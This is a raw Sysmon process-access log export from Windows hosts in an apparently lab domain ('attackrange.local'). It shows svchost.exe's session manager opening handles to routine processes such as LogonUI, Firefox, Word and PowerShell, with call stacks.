12:24:43.143{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440753Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.121{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440752Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.121{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440751Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.120{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440750Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.120{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440749Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.120{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440748Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.120{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292416Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0D2A-00000000BB01}3684C:\Windows\system32\atbroker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292415Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0C2A-00000000BB01}7148C:\Windows\System32\rdpclip.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292414Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0B2A-00000000BB01}5240C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292413Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292412Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-092A-00000000BB01}6536C:\Windows\system32\TSTheme.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292411Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292410Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-2777-6087-1E10-00000000BB01}6080C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292409Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276D-6087-1C10-00000000BB01}4292C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292408Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276D-6087-1B10-00000000BB01}720C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292407Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276C-6087-1A10-00000000BB01}2956C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292406Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276C-6087-1910-00000000BB01}3764C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292405Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292404Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292403Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292402Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-187E-6087-4F0E-00000000BB01}3388C:\Windows\SysWOW64\rundll32.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292401Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-1489-6087-C80D-00000000BB01}4152C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292400Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-1489-6087-C70D-00000000BB01}4324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292399Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D72A-6086-3603-00000000BB01}2104C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292398Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D70A-6086-0C03-00000000BB01}2612C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292397Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D70A-6086-0B03-00000000BB01}2492C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292396Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D6F7-6086-F002-00000000BB01}1196C:\Windows\system32\fontdrvhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292395Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D5E0-6086-A001-00000000BB01}5912C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292394Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D5DD-6086-9E01-00000000BB01}5524C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292393Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4B6-6086-6501-00000000BB01}4240C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292392Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292391Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.410{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292390Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 